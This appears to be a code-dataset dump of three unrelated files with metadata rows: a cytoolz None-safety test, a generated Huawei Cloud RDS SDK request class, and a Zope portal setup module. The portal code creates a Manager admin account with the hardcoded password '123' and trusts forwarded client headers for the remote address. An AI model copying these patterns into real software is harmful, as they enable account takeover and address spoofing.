assert raises(TypeError, lambda: list(remove(identity, None)))
tested.append('remove')
assert raises(TypeError, lambda: second(None))
tested.append('second')
# XXX
assert (raises(TypeError, lambda: list(sliding_window(None, [1, 2, 3]))) or
list(sliding_window(None, [1, 2, 3])) == [])
assert raises(TypeError, lambda: list(sliding_window(1, None)))
tested.append('sliding_window')
# XXX
assert (raises(TypeError, lambda: list(take(None, [1, 2])) == [1, 2]) or
list(take(None, [1, 2])) == [1, 2])
assert raises(TypeError, lambda: list(take(1, None)))
tested.append('take')
# XXX
assert (raises(TypeError, lambda: list(tail(None, [1, 2])) == [1, 2]) or
list(tail(None, [1, 2])) == [1, 2])
assert raises(TypeError, lambda: list(tail(1, None)))
tested.append('tail')
# XXX
assert (raises(TypeError, lambda: list(take_nth(None, [1, 2]))) or
list(take_nth(None, [1, 2])) == [1, 2])
assert raises(TypeError, lambda: list(take_nth(1, None)))
tested.append('take_nth')
assert raises(TypeError, lambda: list(unique(None)))
assert raises(TypeError, lambda: list(unique([1, 1, 2], key=None)))
tested.append('unique')
assert raises(TypeError, lambda: join(first, None, second, (1, 2, 3)))
assert raises(TypeError, lambda: join(first, (1, 2, 3), second, None))
tested.append('join')
assert raises(TypeError, lambda: topk(None, [1, 2, 3]))
assert raises(TypeError, lambda: topk(3, None))
tested.append('topk')
assert raises(TypeError, lambda: list(diff(None, [1, 2, 3])))
assert raises(TypeError, lambda: list(diff(None)))
assert raises(TypeError, lambda: list(diff([None])))
assert raises(TypeError, lambda: list(diff([None, None])))
tested.append('diff')
assert raises(TypeError, lambda: peek(None))
tested.append('peek')
s1 = set(tested)
s2 = set(cytoolz.itertoolz.__all__)
assert s1 == s2, '%s not tested for being None-safe' % ', '.join(s2 - s1)
def test_recipes():
tested = []
# XXX
assert (raises(TypeError, lambda: countby(None, [1, 2])) or
countby(None, [1, 2]) == {(1,): 1, (2,): 1})
assert raises(TypeError, lambda: countby(identity, None))
tested.append('countby')
# XXX
assert (raises(TypeError, lambda: list(partitionby(None, [1, 2]))) or
list(partitionby(None, [1, 2])) == [(1,), (2,)])
assert raises(TypeError, lambda: list(partitionby(identity, None)))
tested.append('partitionby')
s1 = set(tested)
s2 = set(cytoolz.recipes.__all__)
assert s1 == s2, '%s not tested for being None-safe' % ', '.join(s2 - s1)
| [
"[email protected]"
] | |
570d5e5d5fbd8600a45c78d01b6b02a8b09ce153 | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-rds/huaweicloudsdkrds/v3/model/set_database_user_privilege_request.py | 150b872cab2546ae4611dfa32d9ac8d91350c989 | [
"Apache-2.0"
] | permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 4,906 | py | # coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class SetDatabaseUserPrivilegeRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'instance_id': 'str',
'x_language': 'str',
'body': 'SetDatabaseUserPrivilegeReqV3'
}
attribute_map = {
'instance_id': 'instance_id',
'x_language': 'X-Language',
'body': 'body'
}
def __init__(self, instance_id=None, x_language=None, body=None):
"""SetDatabaseUserPrivilegeRequest
The model defined in huaweicloud sdk
:param instance_id: Instance ID
:type instance_id: str
:param x_language: Language
:type x_language: str
:param body: Body of the SetDatabaseUserPrivilegeRequest
:type body: :class:`huaweicloudsdkrds.v3.SetDatabaseUserPrivilegeReqV3`
"""
self._instance_id = None
self._x_language = None
self._body = None
self.discriminator = None
self.instance_id = instance_id
if x_language is not None:
self.x_language = x_language
if body is not None:
self.body = body
@property
def instance_id(self):
"""Gets the instance_id of this SetDatabaseUserPrivilegeRequest.
Instance ID
:return: The instance_id of this SetDatabaseUserPrivilegeRequest.
:rtype: str
"""
return self._instance_id
@instance_id.setter
def instance_id(self, instance_id):
"""Sets the instance_id of this SetDatabaseUserPrivilegeRequest.
Instance ID
:param instance_id: The instance_id of this SetDatabaseUserPrivilegeRequest.
:type instance_id: str
"""
self._instance_id = instance_id
@property
def x_language(self):
"""Gets the x_language of this SetDatabaseUserPrivilegeRequest.
Language
:return: The x_language of this SetDatabaseUserPrivilegeRequest.
:rtype: str
"""
return self._x_language
@x_language.setter
def x_language(self, x_language):
"""Sets the x_language of this SetDatabaseUserPrivilegeRequest.
Language
:param x_language: The x_language of this SetDatabaseUserPrivilegeRequest.
:type x_language: str
"""
self._x_language = x_language
@property
def body(self):
"""Gets the body of this SetDatabaseUserPrivilegeRequest.
:return: The body of this SetDatabaseUserPrivilegeRequest.
:rtype: :class:`huaweicloudsdkrds.v3.SetDatabaseUserPrivilegeReqV3`
"""
return self._body
@body.setter
def body(self, body):
"""Sets the body of this SetDatabaseUserPrivilegeRequest.
:param body: The body of this SetDatabaseUserPrivilegeRequest.
:type body: :class:`huaweicloudsdkrds.v3.SetDatabaseUserPrivilegeReqV3`
"""
self._body = body
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SetDatabaseUserPrivilegeRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
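# Editor's note: a minimal construction sketch, not part of the generated SDK module. The
# keyword arguments mirror __init__ above; both values are placeholders, and a real call
# would also pass a SetDatabaseUserPrivilegeReqV3 instance as `body`.
if __name__ == '__main__':
    request = SetDatabaseUserPrivilegeRequest(instance_id='<instance-id>', x_language='en-us')
    print(request.to_dict())  # plain dict of instance_id, x_language and body (None here)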
| [
"[email protected]"
] | |
fb5e14362c54bc9ed160c239f7c153c7f418275d | 8d5fac378cb1f7c826996e442375c7ee8cb842d5 | /ExpressSuiteTools/ExpressSuiteCore.py | 260f425a82a9434266342c857f1a9fc2b60b8c4d | [] | no_license | ichar/Express-Suite-DMS | 6f4cf7064b774894995b2224a3ca1a13ac4aa64a | bdf3ad7c1ec4bcdec08000bf4ac5315ca6a0ad19 | refs/heads/master | 2021-01-11T10:59:15.101637 | 2018-02-16T02:09:12 | 2018-02-16T02:09:12 | 72,807,311 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38,181 | py | """
ExpressSuiteCore and PortalGenerator classes
$Id: ExpressSuiteCore.py, v 1.0 2007/08/30 12:00:00 Exp $
*** Checked 09/06/2009 ***
"""
__version__ = '$Revision: 1.0 $'[11:-2]
import Zope2
import sys, os
from copy import copy
from locale import setlocale, getlocale, LC_ALL
from string import join
from urllib import splittype, splitport
from urlparse import urlparse
from types import StringType, UnicodeType
from Globals import HTMLFile, DTMLFile, package_home, get_request
from AccessControl import ClassSecurityInfo
from Acquisition import aq_get
from ZPublisher import Publish
from ZPublisher.HTTPRequest import default_port
from ZPublisher.BeforeTraverse import NameCaller, registerBeforeTraverse, queryBeforeTraverse
from Products.CMFCore import permissions as CMFCorePermissions
from Products.CMFCore.FSDTMLMethod import FSDTMLMethod
from Products.CMFCore.FSImage import FSImage
from Products.CMFCore.PortalObject import PortalObjectBase
from Products.CMFCore.DirectoryView import addDirectoryViews, createDirectoryView
from Products.CMFCore.utils import getToolByName, _checkPermission, _getAuthenticatedUser
from Products.CMFDefault import DiscussionItem, SkinnedFolder
from Products.CMFDefault import cmfdefault_globals
from Products.CMFDefault.DublinCore import DefaultDublinCoreImpl
try: from Products.AppTracker.AppTracker import AppTracker
except ImportError: AppTracker = None
from logging import getLogger
logger = getLogger( 'ExpressSuiteCore' )
import Config
if Config.IsSQLCatalog:
import ZSQLCatalogTool as CatalogTool
from Products.ZMySQLDA.DA import Connection as SQLConnection
else:
import CatalogTool
import ActionsTool
import BackupFSRoot
import CommentsTool
import DTMLDocument, DefaultCategories, DepartmentDictionary
import ErrorLogTool, Exceptions, FSFile, FSFolder, Features, GuardedTable
import HTMLDocument, HTMLCard
import Mail, MailFolder, MemberDataTool, MetadataTool
import PropertiesTool, Registry, SearchProfile, ServicesTool, Shortcut
import TaskItem, TypesTool
import UserFolder
# these may need to be upgraded
#from MigrationTool import MigrationTool
from Config import Roles
from Heading import Heading, factory_type_information as Heading_factory_type_information
from ManageCMFContent import ManageCMFContent
from SimpleObjects import ContainerBase
from Utils import InitializeClass, getLanguageInfo, makepath, joinpath, pathdelim, formatComments, \
GetSessionValue, SetSessionValue, ExpireSessionValue
import CustomDefinitions
from CustomObjects import CustomDefs, ObjectHasCustomCategory, ObjectShouldBeCleanedBeforePaste, \
CustomCheckPermission, CustomCookedTableTranslit, getJSCleanerAttrs
factory_type_information = ( \
DTMLDocument.factory_type_information
+ FSFile.factory_type_information
+ FSFolder.factory_type_information
+ GuardedTable.factory_type_information
+ Heading_factory_type_information
+ HTMLDocument.factory_type_information
+ HTMLCard.factory_type_information
+ MailFolder.factory_type_information
+ Registry.factory_type_information
+ SearchProfile.factory_type_information
+ Shortcut.factory_type_information
+ TaskItem.factory_type_information
)
DiscussionItem_fti = copy( DiscussionItem.factory_type_information )
DiscussionItem_fti[0]['disallow_manual'] = 1
SkinnedFolder_fti = copy( SkinnedFolder.factory_type_information )
SkinnedFolder_fti[0]['disallow_manual'] = 1
cmf_factory_type_information = DiscussionItem_fti + SkinnedFolder_fti
class ExpressSuiteCore( ContainerBase, PortalObjectBase, DefaultDublinCoreImpl ):
"""
Functions of this class help in the setup of a new ExpressSuiteCore
"""
_class_version = 1.01
meta_type = 'ExpressSuiteCore'
__implements__ = ( Features.isPortalRoot,
Features.isPrincipiaFolderish,
PortalObjectBase.__implements__,
DefaultDublinCoreImpl.__implements__,
)
isPrincipiaFolderish = 1
security = ClassSecurityInfo()
manage_options = PortalObjectBase.manage_options + \
ContainerBase.manage_options
_properties = (
{'id':'title', 'type':'string', 'mode':'w'},
{'id':'description', 'type':'text', 'mode':'w'},
{'id':'server_url', 'type':'string', 'mode':'w'},
{'id':'stemmer', 'type':'string', 'mode':'w'},
{'id':'product_version', 'type':'string', 'mode':'w'},
)
# overriden by Implicit in ItemBase
__of__ = PortalObjectBase.__of__
# overriden by ObjectManager in ContainerBase
_checkId = PortalObjectBase._checkId
_verifyObjectPaste = PortalObjectBase._verifyObjectPaste
# default attribute values
title = ''
description = ''
server_url = None
product_version = None
service_unavailable = DTMLFile( 'dtml/service_unavailable', globals() )
def __init__( self, id, title='' ):
"""
Initializes class instance
"""
ContainerBase.__init__( self )
PortalObjectBase.__init__( self, id, title )
DefaultDublinCoreImpl.__init__( self )
def _initstate( self, mode ):
"""
Initializes instance attributes
"""
if not ContainerBase._initstate( self, mode ):
return 0
# install our before_traverse hook
if not queryBeforeTraverse( self, __name__ ):
registerBeforeTraverse( self, NameCaller('_beforeTraverseHook'), __name__ )
if not mode:
return 1
if getattr( self, 'server_url', None ) is None:
REQUEST = get_request()
self._setPropValue( 'server_url', REQUEST and REQUEST.physicalPathToURL('') or '' )
self._upgrade( 'portal_actions', ActionsTool.ActionsTool )
self._upgrade( 'portal_catalog', CatalogTool.CatalogTool )
self._upgrade( 'portal_memberdata', MemberDataTool.MemberDataTool )
self._upgrade( 'portal_metadata', MetadataTool.MetadataTool )
self._upgrade( 'portal_properties', PropertiesTool.PropertiesTool )
self._upgrade( 'portal_types', TypesTool.TypesTool )
for view in self.portal_skins.objectValues():
if getattr( view, '_isDirectoryView', None ):
view._dirpath = view._dirpath.replace( '\\', pathdelim )
if not hasattr( self, 'portal_errorlog' ):
tool = ErrorLogTool.ErrorLogTool()
self._setObject( tool.getId(), tool )
if not hasattr( self, 'portal_comments' ):
tool = CommentsTool.CommentsTool()
self._setObject( tool.getId(), tool )
if not hasattr( self, 'portal_services' ):
tool = ServicesTool.ServicesTool()
self._setObject( tool.getId(), tool )
gen = PortalGenerator()
gen.setupMail( self )
return 1
def _afterValidateHook( self, user, published=None, REQUEST=None ):
"""
Prepares global environment after the user is authenticated
"""
self.setContentCharset( REQUEST )
self.fixFormLanguage( REQUEST )
if isinstance( published, FSImage ):
REQUEST.RESPONSE.setHeader( 'Cache-Control', 'public, max-age=7200, must-revalidate' )
elif isinstance( published, FSDTMLMethod ):
REQUEST.RESPONSE.setHeader('Expires', 'Tue, 22 Jan 1980 01:01:01 GMT')
def _beforeTraverseHook( self, container, REQUEST, *args ):
"""
Prepares global environment before any object inside is accessed
"""
try:
self.fixProxiedRequest( REQUEST )
self.setPortalLocale()
self.setContentCharset( REQUEST )
except:
pass
try: mpath = list( Config.MaintainanceMode.get( self._p_oid ) or [] )
except: mpath = None
if not mpath:
return
stack = REQUEST['TraversalRequestNameStack']
mpath.reverse()
if stack and ( stack[-1] in ['portal_errorlog', 'scripts.js', 'styles.css'] or \
stack[0] == 'manage' or stack[0].startswith('manage_') ):
return
if stack[ -len(mpath): ] != mpath:
REQUEST['TraversalRequestNameStack'] = ['maintainance']
def _containment_onAdd( self, item, container ):
"""
Is called after our parent *item* is added to the *container*
"""
# Not calling base class's methods from here avoids reinitialization
# of all the content objects after product version change.
# Setup is carried by generator anyway.
# needs to follow the same scheme as the Scheduler to provide conflict-free database backups
# if more than one ExpressSuiteCore is present in the ZODB.
loop_app = self.getPhysicalRoot()
if not hasattr( loop_app, 'ExpressSuiteBackup' ):
try:
b = BackupFSRoot.BackupFSRoot()
loop_app._setObject( b.id, b )
except:
pass
def _containment_onDelete( self, item, container ):
"""
Is called before our parent *item* is deleted from its *container*
"""
root = self.getPhysicalRoot()
backupFSRoot = getattr(root, 'ExpressSuiteBackup', None)
if backupFSRoot is not None:
backupFSRoot.unregistryAppBackup( joinpath( item.getPhysicalPath() ) )
PortalObjectBase.manage_beforeDelete( self, item, container )
def _instance_onCreate( self ):
self.product_version = Config.ProductVersion
security.declareProtected( CMFCorePermissions.View, 'maintainance' )
def maintainance( self, REQUEST=None ):
"""
Maintainance mode
"""
if _checkPermission( CMFCorePermissions.ManagePortal, self ):
mpath = Config.MaintainanceMode.get( self._p_oid )
return self.redirect( action='/'.join(mpath) )
return self.service_unavailable( self, REQUEST )
#
# ==========================================================================================================
#
def view( self, REQUEST=None ):
""" Invokes the default view of the content storage """
REQUEST = REQUEST or self.REQUEST
return self.storage(REQUEST)
security.declarePrivate( 'fixProxiedRequest' )
def fixProxiedRequest( self, REQUEST ):
""" Fixes environment if request was processed by frontend server """
# mod_proxy: X-Forwarded-Server
# mod_accel: X-Host, X-Real-IP, X-URI, X-Method
server = REQUEST.get('SERVER_URL')
real_host = REQUEST.get('HTTP_X_FORWARDED_SERVER') or REQUEST.get('HTTP_X_HOST')
real_addr = REQUEST.get('HTTP_X_REAL_IP')
real_uri = REQUEST.get('HTTP_X_URI')
# change SERVER_URL to frontend server's address and protocol
if server and real_host:
proto = REQUEST.get('HTTP_X_METHOD') or splittype( server )[0]
host, port = splitport( real_host )
REQUEST.setServerURL( proto, host, port or default_port.get( proto ) )
# set REMOTE_ADDR to the real client's address
if real_addr:
REQUEST.environ['REMOTE_ADDR'] = real_addr
# modify SCRIPT_NAME for proxied requests like
# http://frontend/prefix/portal -> http://backend/portal
if real_uri:
# TODO: handle different portal name on frontend
pos = real_uri.find( REQUEST['PATH_INFO'] )
if pos > 0:
REQUEST._script = real_uri[ 1:pos ].split('/')
security.declarePrivate( 'setPortalLocale' )
def setPortalLocale( self ):
""" Changes system locale according to the portal language """
info = getLanguageInfo( self )
# find default and effective locale settings
def_locale = info.get( sys.platform + '_locale' ) or info.get( os.name + '_locale' )
cur_locale = getlocale()
cur_locale = None not in cur_locale and '.'.join( cur_locale ) or ''
# check whether locale is already ok
if def_locale is None or cur_locale.lower() == def_locale.lower():
return
# change effective locale
try:
setlocale( LC_ALL, def_locale )
except Exceptions.LocaleError:
pass
security.declarePublic( 'setContentCharset' )
def setContentCharset( self, REQUEST=None ):
""" Sets response charset according to the user's selected language """
REQUEST = REQUEST or aq_get( self, 'REQUEST', None )
if REQUEST is None:
return
lang = REQUEST.cookies.get( 'LOCALIZER_LANGUAGE' )
info = getLanguageInfo( lang, None )
if lang is None or info is None:
membership = getToolByName( self, 'portal_membership', None )
if membership is not None:
lang = membership.getLanguage( preferred=1, REQUEST=REQUEST )
info = getLanguageInfo( lang )
REQUEST.set( 'LOCALIZER_LANGUAGE', lang )
if not membership.isAnonymousUser():
path = joinpath( '', REQUEST._script, self.absolute_url( relative=1 ) )
REQUEST.RESPONSE.setCookie( 'LOCALIZER_LANGUAGE', lang, path=path )
charset = info['http_charset']
REQUEST.set( 'LOCALIZER_CHARSET', charset )
REQUEST.set( 'management_page_charset', charset )
REQUEST.RESPONSE.setHeader( 'content-type', 'text/html; charset=%s' % charset )
security.declarePublic( 'fixFormLanguage' )
def fixFormLanguage( self, REQUEST ):
"""
Replaces HTML-encoded entities with their corresponding
characters in the POST form data
"""
if REQUEST is None:
return
lang = REQUEST.get( 'LOCALIZER_LANGUAGE' )
map = Config.LanguageEntitiesMap.get( lang )
if map is None:
return
for key, value in REQUEST.form.items():
if type(value) in ( StringType, UnicodeType, ):
for entity, char in map.items():
value = value.replace( entity, char )
REQUEST.form[ key ] = value
if REQUEST.REQUEST_METHOD == 'PUT':
value = REQUEST.other.get('BODY')
if value is not None:
for entity, char in map.items():
value = value.replace( entity, char )
REQUEST.other['BODY'] = value
security.declareProtected( CMFCorePermissions.View, 'isEffective' )
def isEffective( self, date ):
""" Override DefaultDublinCoreImpl's test, since we are always viewable """
return 1
def reindexObject( self, idxs=[] ):
""" Overrides DefaultDublinCoreImpl's method """
pass
def productVersion( self ):
""" Returns version string of the product """
return Config.ProductVersion
#
# Portal global utilities ==================================================================================
#
security.declarePublic( 'getPortalObject' )
def getPortalObject( self ):
""" Returns the portal object itself """
return self
security.declarePublic( 'getPortalConfiguration' )
def getPortalConfiguration( self ):
""" Returns the PortalConfiguration object """
return CustomDefinitions.portalConfiguration
security.declarePublic( 'getDepartmentDictionary' )
def getDepartmentDictionary( self ):
""" Returns the DepartmentDictionary object """
return DepartmentDictionary.departmentDictionary
security.declarePublic( 'getCustomDefinitions' )
def getCustomDefinitions( self, defs, *args, **kw ):
""" Returns given custom definition value """
return CustomDefs( defs, *args, **kw )
security.declarePublic( 'hasCustomCategory' )
def hasCustomCategory( self, context ):
""" Returns given custom definition value """
return ObjectHasCustomCategory( context )
def shouldBeCleanedBeforePaste( self, context ):
""" Verifies whether content body should be cleaned before paste """
return ObjectShouldBeCleanedBeforePaste( context )
security.declarePublic( 'getJSCleanerForCategory' )
def getJSCleanerAttrsForCategory( self, context, category, **kw ):
""" Returns js cleaner attrs """
return getJSCleanerAttrs( context, category, **kw )
security.declarePublic( 'getCustomCookedTableTranslit' )
def getCustomCookedTableTranslit( self, context, id, values ):
""" Returns translitted custom data table values """
return CustomCookedTableTranslit( context, id, values )
security.declarePublic( 'getFormattedComments' )
def getFormattedComments( self, text, mode=None ):
""" Returns formatted comments text """
return formatComments( text, mode )
security.declarePublic( 'hasCustomPermissions' )
def hasCustomPermissions( self, context, permission ):
""" Returns given custom definition value """
return CustomCheckPermission( context, permission )
security.declarePublic( 'getSession' )
def getSession( self, name, default=None, REQUEST=None, cookie=None ):
""" Returns session data value """
return GetSessionValue( self, name, default, REQUEST, cookie )
security.declarePublic( 'setSession' )
def setSession( self, name, value, REQUEST=None, cookie=None ):
""" Stores session data value """
SetSessionValue( self, name, value, REQUEST, cookie )
InitializeClass( ExpressSuiteCore )
class PortalGenerator:
klass = ExpressSuiteCore
def setupTools( self, p ):
"""
Setup initial tools
"""
addCMFCoreTool = p.manage_addProduct['CMFCore'].manage_addTool
addCMFCoreTool( 'CMF Skins Tool', None )
addCMFCoreTool( 'CMF Undo Tool', None )
addCMFCoreTool( 'CMF URL Tool', None )
addCMFDefaultTool = p.manage_addProduct['CMFDefault'].manage_addTool
addCMFDefaultTool( 'Default Discussion Tool', None )
addCMFDefaultTool( 'Default Registration Tool', None )
addExpressSuiteTool = p.manage_addProduct['ExpressSuiteTools'].manage_addTool
addExpressSuiteTool( 'ExpressSuite Actions Tool', None )
addExpressSuiteTool( 'ExpressSuite Catalog Tool', None )
addExpressSuiteTool( 'ExpressSuite Comments Tool', None )
addExpressSuiteTool( 'ExpressSuite DocumentLink Tool', None )
addExpressSuiteTool( 'ExpressSuite ErrorLog Tool', None )
addExpressSuiteTool( 'ExpressSuite Followup Actions Tool', None )
addExpressSuiteTool( 'ExpressSuite Help Tool', None )
addExpressSuiteTool( 'ExpressSuite Member Data Tool', None )
addExpressSuiteTool( 'ExpressSuite Membership Tool', None )
addExpressSuiteTool( 'ExpressSuite Metadata Tool', None )
addExpressSuiteTool( 'ExpressSuite Properties Tool', None )
addExpressSuiteTool( 'ExpressSuite Types Tool', None )
addExpressSuiteTool( 'ExpressSuite Workflow Tool', None )
addExpressSuiteTool( 'ExpressSuite Services Tool', None )
addExpressSuiteTool( 'Portal Scheduler Tool', None )
#addExpressSuiteTool( 'ExpressSuite Migration Tool', None )
def setupMessageCatalog( self, p, language ):
langs = Config.Languages
p.manage_addProduct['Localizer'].manage_addMessageCatalog( 'msg', 'Messages', langs.keys())
msg = p._getOb( 'msg' )
path = joinpath( package_home( globals() ), 'locale' )
msg.manage_changeDefaultLang( language or Config.DefaultLanguage )
for lang, info in langs.items():
charset = info['python_charset'].upper()
msg.update_po_header( lang, '', '', '', charset )
# import PO file into the Message Catalog
try:
file = open( joinpath( path, '%s.po' % lang ), 'rt' )
except IOError:
pass
else:
msg.manage_import( lang, file )
file.close()
# fix empty string (just in case...)
msg.manage_editLS( '', (lang, '') )
# select default language
p.setPortalLocale()
p.setContentCharset()
def setupMail( self, p ):
"""
Create mail objects
"""
mh = getattr( p, 'MailHost', None )
if not ( mh is None or isinstance( mh, Mail.MailServerBase ) ):
p._delObject( 'MailHost' )
mh = None
if mh is None:
Mail.manage_addMailSender( p, 'MailHost', host='' )
if getattr( p, 'MailServer', None ) is None:
Mail.manage_addMailServer( p, 'MailServer', host='' )
def setupUserFolder( self, p ):
p.manage_addProduct['ExpressSuiteTools'].addUserFolder()
def setupCookieAuth( self, p ):
p.manage_addProduct['CMFCore'].manage_addCC( id='cookie_authentication' )
p.cookie_authentication.auto_login_page = ''
def setupRoles( self, p ):
p.__ac_roles__ = ( 'Member', 'Visitor', 'Editor', 'Writer', 'Reader', 'Author', 'VersionOwner' )
def setupPermissions( self, p ):
"""
Setup some suggested roles to permission mappings
"""
mp = p.manage_permission
for entry in Config.PortalPermissions:
apply( mp, entry )
def setupDefaultSkins( self, p ):
"""
Setup portal skins
"""
pstool = getToolByName( p, 'portal_skins', None )
#pstool = getattr( p, 'portal_skins', None )
if pstool is None:
return
cmf_manager = ManageCMFContent()
for view in Config.SkinViews:
cmf_manager.register_view( pstool, 'skins/%s' % view )
# these skin elements are available for anonymous visitors
#for name in Config.PublicViews:
# pstool[ name ].manage_permission( CMFCorePermissions.View, [Roles.Anonymous], 1 )
addDirectoryViews( pstool, 'skins', cmfdefault_globals )
pstool.manage_addProduct['OFSP'].manage_addFolder( id='custom' )
default_skins = ', '.join( ['custom'] + Config.SkinViews )
pstool.addSkinSelection( 'Site', default_skins, make_default=1 )
pstool.addSkinSelection( 'Mail', 'mail_templates' )
p.setupCurrentSkin()
def setupTypes( self, p, initial_types=factory_type_information ):
"""
Setup portal types
"""
tptool = getToolByName( p, 'portal_types', None )
#tptool = getattr( p, 'portal_types', None )
if tptool is None:
return
for x in initial_types:
if not tptool.getTypeInfo( x['id'] ):
tptool.addType( x['id'], x )
def setupCategories( self, p, categories=None, **kw ):
"""
Setup default categories
"""
metadata = getToolByName( p, 'portal_metadata', None )
if metadata is None:
return
if not categories:
categories = ['Document', 'SimpleDocs']
default_categories = DefaultCategories.DefaultCategories()
for id in categories:
if metadata.getCategoryById( id ):
continue
category = DefaultCategories.setupCategory( default_categories, id, metadata )
if category is None:
continue
workflow = category.getWorkflow()
if workflow is None:
continue
DefaultCategories.setupWorkflow( default_categories, workflow, id, metadata )
del default_categories
def setupMimetypes( self, p ):
"""
Setup mime types
"""
p.manage_addProduct[ 'CMFCore' ].manage_addRegistry()
reg = p.content_type_registry
reg.addPredicate( 'dtml', 'extension' )
reg.getPredicate( 'dtml' ).edit( extensions="dtml" )
reg.assignTypeName( 'dtml', 'DTMLDocument' )
reg.addPredicate( 'link', 'extension' )
reg.getPredicate( 'link' ).edit( extensions="url, link" )
reg.assignTypeName( 'link', 'Link' )
reg.addPredicate( 'news', 'extension' )
reg.getPredicate( 'news' ).edit( extensions="news" )
reg.assignTypeName( 'news', 'News Item' )
reg.addPredicate( 'document', 'major_minor' )
reg.getPredicate( 'document' ).edit( major="text", minor="" )
reg.assignTypeName( 'document', 'HTMLDocument' )
reg.addPredicate( 'image', 'major_minor' )
reg.getPredicate( 'image' ).edit( major="image", minor="" )
reg.assignTypeName( 'image', 'Site Image' )
reg.addPredicate( 'file', 'major_minor' )
reg.getPredicate( 'file' ).edit( major="application", minor="" )
reg.assignTypeName( 'file', 'File' )
def setupWorkflow( self, p, check=0 ):
"""
Setup default workflow
"""
workflow = getToolByName( p, 'portal_workflow', None )
tptool = getToolByName( p, 'portal_types', None )
if workflow is None or tptool is None:
return
cbt = workflow._chains_by_type
count = 0
seen = []
for chain, types in Config.WorkflowChains.items():
seen.extend( types )
for pt in types:
if not cbt or cbt.get( pt ) != chain:
count += 1
if not check:
wf_id = 'heading_workflow'
workflow.createWorkflow( wf_id )
workflow.setChainForPortalTypes( Config.WorkflowChains['heading_workflow'], ( wf_id, ) )
workflow.setChainForPortalTypes( Config.WorkflowChains['__empty__'], ('', ) )
DefaultCategories.setupHeadingWorkflow( workflow.getWorkflowById( wf_id ) )
return count
def setupDefaultMembers( self, p, lang='ru' ):
"""
Adds default members and groups
"""
membership = getToolByName( p, 'portal_membership', None )
msg = getToolByName( p, 'msg', None )
if None in ( membership, msg ):
return None
membership._addGroup( 'all_users', msg.gettext( 'All users', lang=lang ) )
membership._addGroup( '_managers_', msg.gettext( 'Managers', lang=lang ) )
username = None
        try:
            username = _getAuthenticatedUser().getUserName()
        except:
            pass
if not username:
username = 'admin'
roles = ( 'Member', 'Manager', )
properties = { 'lname' : msg.gettext( 'admin', lang=lang ) }
membership.addMember( id=username, password='123', roles=roles, domains='', properties=properties )
member = membership.getMemberById( username )
if member is None:
return None
users = [ username ]
membership.manage_changeGroup( group='all_users', group_users=users )
membership.manage_changeGroup( group='_managers_', group_users=users )
return member
def setupStorage( self, p, create_userfolder=None ):
"""
Setup storage folders
"""
if p is None:
return
base = p.manage_addProduct['ExpressSuiteTools']
if base is None:
return
msg = getToolByName( p, 'msg', None )
if msg is None:
return
lang = msg.get_default_language()
member = create_userfolder and self.setupDefaultMembers( p, lang ) or None
storage = self._makeHeading( p.manage_addProduct['ExpressSuiteTools'], 'storage', \
msg.gettext( 'Content storage', lang=lang ) )
if storage:
self._makeHeading( p.storage.manage_addProduct['ExpressSuiteTools'], 'members', \
msg.gettext( 'Home folders', lang=lang ) )
self._makeHeading( p.storage.manage_addProduct['ExpressSuiteTools'], 'user_defaults', \
msg.gettext( 'Default content', lang=lang ) )
system = self._makeHeading( p.storage.manage_addProduct['ExpressSuiteTools'], 'system', \
msg.gettext( 'System folders', lang=lang ) )
else:
system = None
if system:
self._makeHeading( p.storage.system.manage_addProduct['ExpressSuiteTools'], 'templates', \
msg.gettext( 'Document templates', lang=lang ) )
if storage:
mp = p.storage.manage_permission
mp('List folder contents', ['Owner','Manager', 'Editor', 'Writer', 'Reader', 'Author'], 0)
mp('View', ['Owner','Manager', 'Member'], 1)
if create_userfolder and member is not None:
home = member.getHomeFolder( create=1 )
# add access rights for system folder
if system:
p.storage.system.manage_setLocalGroupRoles( 'all_users', ['Reader'] )
if storage:
if member is not None:
p.storage.changeOwnership( member, recursive=1 )
p.storage.reindexObject( recursive=1 ) #idxs=['allowedRolesAndUsers'],
def setupTracker( self, p ):
"""
Setup tracker
"""
pass
def setupActions( self, p ):
"""
Setup portal actions
"""
actions = getToolByName( p, 'portal_actions', None )
if actions is None:
return
actions.action_providers = ( \
'portal_comments'
, 'portal_discussion'
, 'portal_help'
, 'portal_membership'
, 'portal_metadata'
, 'portal_properties'
, 'portal_registration'
, 'portal_services'
, 'portal_scheduler'
, 'portal_undo'
, 'portal_workflow'
)
def setupCatalog( self, p ):
"""
Setup portal catalogs
"""
tool_ids = ( 'portal_catalog', 'portal_followup', 'portal_links', )
for id in tool_ids:
ob = getToolByName( p, id, None )
if ob is None:
return
if Config.IsSQLCatalog and ob.implements('IZSQLCatalog'):
ob.sql_db_name = p.getId()
ob.sql_prefix = ''.join([ x[0:1] for x in id.split('_') ] )
ob.sql_root = '_Root'
ob.sql_user = Config.SQLDBUser
ob.setup()
ob.setupIndexes()
